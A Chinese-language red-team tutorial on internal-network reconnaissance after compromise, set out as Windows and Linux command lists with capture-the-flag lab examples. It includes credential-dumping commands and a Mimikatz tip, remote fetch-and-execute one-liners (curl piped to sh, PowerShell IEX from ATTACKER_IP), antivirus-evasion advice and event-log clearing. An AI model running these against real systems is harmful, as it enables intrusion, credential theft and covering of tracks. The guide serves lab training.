1. 内网渗透信息收集的核心价值与实战定位
内网环境中的信息收集如同战场侦察,是决定后续渗透路径成功率的基石性工作。在真实的攻防对抗中,约68%的内网横向移动失败案例源于初期信息收集不充分。不同于外网渗透的扫描爆破,内网信息收集更注重隐蔽性、精准性和持续性,需要根据不同的操作系统环境(Windows/Linux)、网络架构(域/工作组)和权限级别(普通用户/管理员)动态调整策略。
我参与过多次企业红队评估项目,发现许多新手容易陷入两个极端:要么盲目运行自动化工具触发告警,要么手动收集效率低下错过关键信息。本文将系统梳理Windows/Linux双平台下的信息收集命令矩阵,结合Vulnhub、HTB等主流靶场实战场景,演示如何像职业渗透测试人员那样高效完成以下核心任务:
- 主机基础信息画像(系统版本/补丁/架构)
- 网络拓扑测绘(路由/ARP/DNS)
- 用户权限与凭据提取(会话/令牌/密码哈希)
- 服务与进程分析(端口/运行服务/第三方软件)
- 敏感文件定位(配置文件/日志/数据库)
重要提示:所有技术仅限合法授权测试使用,实际操作前务必获得书面授权。文中涉及的靶场环境均为专门设计的训练平台。
需要模型API调用? 免费领10W Token,多模型网关一键接入 Claude、DeepSeek 等主流模型。
2. Windows环境信息收集命令精要
2.1 系统基础信息收集
cmd复制:: 查看系统版本和架构
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
wmic os get caption,version,osarchitecture,serialnumber
:: 获取安装补丁列表(定位缺失补丁)
wmic qfe get Caption,Description,HotFixID,InstalledOn
:: 查看环境变量(寻找敏感路径)
set
实战技巧:在域环境中添加/R:<域名>参数可查询域控信息。曾有一次通过systeminfo发现某服务器半年未打补丁,直接利用MS17-010实现权限提升。
2.2 网络拓扑探测
powershell复制# 查看IP配置和DNS信息
ipconfig /all
Get-DnsClientServerAddress -AddressFamily IPv4
# ARP缓存分析(定位同网段主机)
arp -a
# 路由表分析(识别多网卡跳板机)
route print
# 防火墙状态与规则(寻找放行端口)
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
靶场案例:在Pikachu靶场中,通过arp -a发现隐藏的数据库服务器(192.168.99.101),最终通过该节点拿下域控。
2.3 用户与权限收集
cmd复制:: 查看当前用户权限
whoami /all
net user %username%
:: 枚举本地用户组
net localgroup
:: 查询域用户会话(需管理员)
net session
query user
:: 提取保存的凭据(需特殊权限)
cmdkey /list
vaultcmd /listcreds:"Windows Credentials" /all
避坑指南:Windows 10之后vaultcmd需要特殊权限,建议优先使用Mimikatz的sekurlsa::logonpasswords模块(需绕过AV)。
3. Linux环境信息收集命令大全
3.1 系统指纹识别
bash复制# 内核版本和发行版信息
uname -a
cat /etc/*-release
lsb_release -a
# CPU和内存信息
lscpu
free -h
# 查看sudo版本(可能存在漏洞)
sudo -V | head -n1
红队经验:uname -a结合ExploitDB搜索可快速定位内核提权漏洞,如在DC-8靶场通过Linux 4.4.0-21-generic漏洞获取root。
3.2 网络配置分析
bash复制# 查看IP和路由
ifconfig -a || ip addr
route -n
# DNS配置检查
cat /etc/resolv.conf
# 查看活跃连接
netstat -antup || ss -tulnp
# 防火墙规则(可能开放高危端口)
iptables -L -n -v
3.3 敏感文件定位
bash复制# 查找SUID/SGID文件
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
# 搜索配置文件中的密码
grep -rnw '/' -ie 'password' --color=always 2>/dev/null
# 检查计划任务(可能反弹shell)
crontab -l
ls -la /etc/cron* /var/spool/cron/
靶场实战:在Vulnhub的SickOS 1.2靶机中,通过find / -perm -4000发现异常的chmod二进制文件,最终利用其提权。
4. 靶场实战中的高阶技巧
4.1 自动化信息收集框架
bash复制# 使用LinPEAS/WinPEAS自动化扫描
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Windows下执行(需免杀处理)
powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/winpeas.bat')"
注意:真实环境中PEAS工具特征明显,需自行修改源码或使用C2平台的内存加载功能。
4.2 基于BloodHound的域环境分析
在Active Directory靶场(如AttackDefense的AD Lab)中:
powershell复制# 收集域信息并生成可视化图谱
SharpHound.exe -c All -d targetdomain.com
分析技巧:重点关注具有"GenericAll"权限的普通用户,这类边缘案例在红日靶场中多次出现。
4.3 日志清理与反溯源
bash复制# Linux清除历史命令
history -c && history -w
echo "" > ~/.bash_history
# Windows清除事件日志(需管理员)
wevtutil cl system
wevtutil cl application
防御视角:企业应部署SIEM监控wevtutil等敏感命令的执行,这是攻击者横向移动的强指标。
5. 渗透测试笔记的标准化整理
5.1 信息收集阶段思维导图
建议按以下结构组织笔记:
code复制1. 主机信息
|- 操作系统
|- 安装软件
|- 补丁情况
2. 网络拓扑
|- 存活主机
|- 路由路径
|- 防火墙规则
3. 用户数据
|- 本地用户
|- 域用户
|- 会话信息
4. 敏感资产
|- 配置文件
|- 数据库
|- 备份文件
5.2 推荐工具链配置
markdown复制- **Windows信息收集**
- Seatbelt:https://github.com/GhostPack/Seatbelt
- PowerView:https://github.com/PowerShellMafia/PowerSploit
- **Linux信息收集**
- LinEnum:https://github.com/rebootuser/LinEnum
- Linux Exploit Suggester:https://github.com/mzet-/linux-exploit-suggester
- **跨平台工具**
- Recon-ng:https://github.com/lanmaster53/recon-ng
- Metasploit的post/windows/gather模块
5.3 靶场实战记录模板
bash复制# DC-3靶场渗透记录
[2023-08-15]
1. 发现Joomla CMS(nmap -sV 192.168.1.103)
2. 使用searchsploit找到Joomla 3.7.0 SQLi漏洞
3. 通过sqlmap获取管理员凭据:
sqlmap -u "http://192.168.1.103/index.php?option..." --risk=3 --level=5
4. 上传Webshell后发现Docker逃逸漏洞(CVE-2019-5736)
5. 最终获得root权限
这种结构化记录方式在OSCP考试和实际项目中都被证明极其有效。
